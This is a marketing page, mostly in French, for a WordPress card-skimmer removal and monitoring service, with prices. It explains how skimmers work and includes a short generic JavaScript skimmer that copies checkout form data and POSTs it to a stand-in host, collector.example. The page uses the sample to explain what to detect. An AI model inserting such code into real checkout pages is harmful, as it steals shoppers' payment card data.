threatover Patrik Grobshäuser

PHARMA HACK · WORDPRESS · NETTOYÉ

WordPress credit card skimmer removal.

Manual removal of the card skimmer. I find the entry point and write a report your acquirer can read. Flat $279.

MÉCANISME

Quelques lignes de JavaScript suffisent à voler chaque commande.

Un skimmer de carte est un minuscule JavaScript qui écoute votre formulaire de paiement. Dès qu’un client saisit son numéro, le skimmer en fait une copie et l’envoie à une adresse contrôlée par l’attaquant — souvent un serveur d’apparence inoffensive.

La page fonctionne toujours. La commande passe toujours. Ni le client ni vous ne voyez rien d’anormal. Nous reproduisons la commande dans un bac à sable, traçons le script jusqu’à son emplacement réel sur votre site et le supprimons sans casser le reste du paiement.

forme générique d’un skimmer de paiement
01 document.querySelector('form.checkout').addEventListener('submit', function (e) {
02   const data = new FormData(e.target);
03   fetch('https://collector.example/c', {
04     method: 'POST', body: data, mode: 'no-cors'
05   });
06 });
07
08 // A fetch to an external host on form submit is the signature.

What I remove

Chaque endroit où cette infection se cache.

  • TRIAGE DES PLUGINS

    Nous passons une commande de test en bac à sable et surveillons chaque appel réseau du checkout.

  • JAVASCRIPT

    Fichiers de thème, ressources d’extensions et scripts inline examinés. Tout ce qui envoie des données de formulaire hors domaine — retiré.

  • BASE DE DONNÉES

    Scripts injectés dans wp_options, wp_posts et widgets actifs — supprimés. La persistance est cassée.

  • SERVICES

    Portes dérobées PHP qui réinstallent le skimmer traquées. Tâches cron et must-use plugins vérifiés.

  • CHRONOLOGIE

    Dates de première et dernière observation établies pour savoir quelles commandes ont été exposées.

  • RAPPORT

    Rapport forensique en clair, adapté aux clients, assureurs ou archives.

Tarifs

Cleanup

$279

flat, one-time, per site

Manual cleanup, entry-vector identification, written forensic report.

Démarrer un nettoyage

Monitoring

$29 / mo

per site, cancel any time

Surveillance continue, durcissement, un nettoyage par an inclus.

Se protéger

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Voir tous les services →

E-mail [email protected] or use the contact form.